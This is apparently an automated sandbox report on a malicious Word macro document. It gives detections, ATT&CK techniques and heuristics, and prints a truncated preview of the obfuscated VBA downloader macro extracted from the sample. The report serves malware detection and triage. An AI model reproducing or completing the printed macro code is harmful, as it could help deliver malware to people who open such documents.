Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an AutoOpen macro that uses CreateObject, suggesting it is designed to execute code as soon as the document is opened. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature. The VBA script itself is heavily obfuscated, but the presence of the 'macros.bas' artifact and the AutoOpen execution pattern strongly suggest it acts as a downloader for a second-stage payload, likely delivered via spearphishing.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34288 bytes |

SHA-256: b735878d03974b52593abef4b807729850b2c05d1d2b04cc54486e3db8e44751

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 14 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ahvJAlTOji"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rtwwCGuqZCjWri"
Function RXdXtbklZS()
On Error Resume Next
pnVpi = 96047 * 71685
HoKva = (50774 + CDate(97837 / Atn(uZAuI)) / 71614 * OTSpih * 2817 * CInt(UcTKCm) * wpMrJz / CSng(EtOQK))
ZbqwEK = Tan(13423)
TCjbvtrEfF = irAZQ("aYnUAFYM+Qx5fq3/z7Cbb", 8, 12)
MIGZF = 90072 * 82230
HPwjQ = (54650 + CDate(20218 / Atn(QcjwPZ)) / 51257 * WFUsm * 43532 * CInt(rfIkh) * RDCbl / CSng(zTbjzR))
fciKG = Tan(74768)
hXARmA = 19752 * 50574
fYwtS = (13515 + CDate(50478 / Atn(EDGLW)) / 78539 * LKQwh * 96372 * CInt(FMVOkc) * lBjEiE / CSng(vkvcvi))
UfZKih = Tan(13198)
HsCstzGM = irAZQ("U,WH/et7Ne2HWXXlOeN1XjJv726vyuGdd+fvQstcn1L+sa933J3WN6b5W+1xDvBDPR+m6rfa5TrwxJD0", 5, 74)
jNsOhS = 71695 * 44615
WzmTC = (44838 + CDate(13026 / Atn(kjPaVT)) / 72095 * KkhwE * 4527 * CInt(iJSWLQ) * PKNrG / CSng(sUSISS))
wrBNtH = Tan(90472)
atqfkS = 13361 * 90406
SzTVw = (70632 + CDate(2780 / Atn(ScqfX)) / 75148 * JCihk * 38478 * CInt(pOwFad) * iMpSt / CSng(UhKcFF))
UVjGDG = Tan(48501)
wzwUR = irAZQ("rCdPGPqQzt+vrxc366S4dau/m7YeHse1tv3+4Thbqi+8uzt+/G/5U/D0YDN69H5b/XA2LcjgoPw/eXYkNW0", 3, 77)
hjZKB = 52502 * 19640
WqKYQ = (75202 + CDate(30294 / Atn(Niwwb)) / 86523 * bfWWU * 60427 * CInt(CUEizc) * HrNJc / CSng(lvhjhF))
sZHcvo = Tan(56537)
wvDLqp = 73966 * 74272
qwvYss = (53602 + CDate(55595 / Atn(dUsLfZ)) / 19227 * vWBlm * 85417 * CInt(sTfYTT) * FPGzWi / CSng(jaTUi))
QDlQiB = Tan(55153)
ojRwnWcdXAQ = irAZQ("bdJqCj9Jl", 6, 2)
QkpDGw = 60949 * 48674
DJUqP = (55353 + CDate(9271 / Atn(CbNMvi)) / 31650 * wfphP * 88719 * CInt(qspiR) * QjUKNP / CSng(OFAaj))
baPiUC = Tan(47696)
kDnHn = 58015 * 18115
iitYk = (75343 + CDate(54366 / Atn(bAPTj)) / 37515 * GzwIG * 16337 * CInt(VWiFik) * jcMqvJ / CSng(cWKtz))
IQzRU = Tan(32076)
rEBuvRTNjfz = irAZQ("dV1ROMPT+Gk72Sc018ZPwk38L+nnX1OgIPnfiE9UO+a+G21lwG7xXkE/FQp3iMc20mPm6i5jfqCJwUml/oF8674OeJT9S1ctxsNH8K4aPkveQD4Mx5OhIfy/jNXEn35zw34OeakV", 7, 128)
jJpWDw = 65356 * 25463
qiEsR = (85482 + CDate(47303 / Atn(cnKAi)) / 52225 * OGzoFY * 31612 * CInt(RCGZmq) * zbIFjj / CSng(HrPrvo))
GjCiBH = Tan(93601)
cMohbC = 81300 * 2227
KMGmHv = (52835 + CDate(98060 / Atn(TEGAEV)) / 93504 * zZKQQ * 86286 * CInt(bWimli) * KbFcpl / CSng(hZvhzI))
nbHTl = Tan(29284)
iYWiLamS = irAZQ("n71XTSRY32l530q/TxNPN8w7qwTsfTPpfnbt6btK9wf5QeYp7AB5PAvnTekJ6aiX9mef9Ff+163Uu7gfWhzkd9yU81+YnzpVS/bPq9nvN5e9qn40kfR+2xkXE0kXnmnt/0ezB1OfYc4DTPyVnew9CPWS9iDr/0v3tgz+cnf5/wfpEeNPYDdTdjm1rb", 5, 177)
RqcuT = 37008 * 21379
RpNwtu = (57750 + CDate(90866 / Atn(fKhRzO)) / 66521 * kjnuW * 36425 * CInt(PWtlci) * STvIG / CSng(CPIJj))
nailRc = Tan(88526)
MACCr = 23936 * 41651
pDqYa = (2448 + CDate(56557 / Atn(tSWHj)) / 64863 * zFYDwz * 93475 * CInt(Vmpia) * ownPY / CSng(jzziPn))
dpWUi = Tan(58267)
wPiAQjcKqPR = irAZQ("qv8vvD3O9gxv7d1u1u338Afvyc9T/43eJ7Od8l+eh6yn27H72vdTu32R56vdO7o9lL86Xnw+O89zvTei8eR4obfc0ufk+hx3NMP5iN0Hn/w9wf+fY58RX9/558N7MQUn/Lp8bdDV3v", 2, 132)
DwTIX = 6254 * 85532
UlkSCF = (9627 + CDate(41591 / Atn(rLnzBG)) / 79698 * KbShzR * 13744 * CInt(Ewsdi) * VBAcNw / CSng(lPYUmd))
qZBpd = Tan(40459)
hliJC = 15003 * 5521
FMisd = (92740 + CDate(36382 / Atn(ObiSwC)) / 65679 * LkwiJw * 31927 * CInt(AMwwd) * rtQpE / CSng(RaSMaT))
vYUEfD = Tan(86621)
MCdMAzpFHw = irAZQ("%w3qwD4Bb+04J8i7heb8a6ZA", 3, 17)
RLULGv = 13608 * 84708
zUUrj = (79259 + CDate(4206 / Atn(zAUkR)) / 68021 * pOVwj * 14783 * CInt(ukYZh) * izlKiB / CSng(GzsLj))
vhCYM = Tan(99936)
YjUavG = 74253 * 4347
FEzBqz = (46651 + CDate(58933 / Atn(uHZusw)) / 84803 * Tapvl * 69887 * CInt(fLYqD) * JHvCnd / CSng(GtEwr))
IAGdr = Tan(41845)
NkhRn = irAZQ("Dvd4exT.encOdiNg]::AScii )}).ReadtOEnD()a5", 5, 36)
dnMMAT = 38062 * 83649
iZhaE = (71079 + CDate(1449 / Atn(sEVSMZ)) / 41857 * EWbFYh * 63611 * CInt(UwVui) * TJijO / CSng(QQJXzc))
mAQQNq = Tan(39930)
iJvMP = 2289 *
```

... (truncated)